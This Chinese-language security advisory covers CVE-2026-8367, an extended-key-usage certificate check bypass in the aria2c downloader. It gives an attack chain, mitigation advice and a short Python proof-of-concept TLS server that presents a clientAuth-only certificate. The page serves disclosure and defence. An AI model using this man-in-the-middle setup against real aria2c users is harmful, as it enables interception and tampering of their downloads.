CVE-2026-8367 aria2c EKU证书验证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-8367

漏洞类型

证书验证绕过

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

aria2c

漏洞概述

aria2c 在处理 TLS 连接时存在安全缺陷，未能正确验证服务器证书的扩展密钥用法（EKU）。攻击者若获取了用于其他用途（如客户端认证）的合法证书及其私钥，可利用该漏洞重用于 aria2c 的服务器认证。这可能导致中间人攻击，破坏通信数据的机密性和完整性。

技术细节

该漏洞源于 aria2c 在 TLS 握手过程中的证书校验逻辑不完整。根据 PKI 标准，服务器证书通常应包含特定的 EKU OID（如 id-kp-serverAuth）。aria2c 未强制检查这一字段，导致它接受仅标记为客户端认证（id-kp-clientAuth）或其他非服务器用途的证书。攻击者通过复用泄露的非服务器用途私钥，可以伪装成合法的服务器与 aria2c 通信。由于证书链本身可能是有效的（由受信任 CA 签发），常规的信任链校验无法拦截此攻击，必须依赖 EKU 字段的严格匹配来防御。

攻击链分析

STEP 1

1. 证书获取

攻击者获取了非服务器认证用途（如仅用于客户端认证）的证书及其私钥。

STEP 2

2. 流量拦截或伪造

攻击者在网络中拦截流量或搭建伪造的 HTTPS 服务器。

STEP 3

3. 证书出示

攻击者使用获取的证书与 aria2c 客户端建立 TLS 连接。

STEP 4

4. 验证绕过

aria2c 因未检查 EKU 字段，错误地接受了该证书。

STEP 5

5. 数据泄露或篡改

攻击者成功解密通信内容或向客户端发送恶意数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual PoC to test EKU validation in aria2c
# This script demonstrates the logic of testing the vulnerability.
# It requires generating a certificate with incorrect EKU.

import subprocess
import socket
import ssl

# Step 1: Attacker generates a certificate with 'clientAuth' EKU (not 'serverAuth')
# Command (conceptual):
# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes \
#   -addext "extendedKeyUsage=clientAuth"

def setup_malicious_server():
    # Create a simple SSL context using the 'wrong' certificate
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # Load cert intended for client auth only
    context.load_cert_chain('cert.pem', 'key.pem') 
    
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind(('0.0.0.0', 443))
        sock.listen(5)
        with context.wrap_socket(sock, server_side=True) as ssock:
            print("Server listening with clientAuth certificate...")
            conn, addr = ssock.accept()
            print(f"Connection accepted from {addr}")
            # If aria2c connects here without error, the vulnerability is confirmed
            conn.send(b"HTTP/1.1 200 OK\r\n\r\nExploit Success")
            conn.close()

print("Note: To execute this PoC, generate 'cert.pem' with EKU=clientAuth first.")
print("Then run this server and try to download from it using aria2c.")

影响范围

aria2c (具体受影响版本未在提供文本中明确列出，请参考官方通告)

防御指南

临时缓解措施

建议立即关注官方发布的修复补丁并进行升级。在未修复前，尽量避免在不可信网络环境下使用 aria2c 下载敏感资源，或通过双重校验机制确认下载文件的完整性。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8367
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8367
3 Details https://www.cvedetails.com/cve/CVE-2026-8367/
4 VulDB https://vuldb.com/cve/CVE-2026-8367
5 Link https://www.tenable.com/security/research/tra-2026-38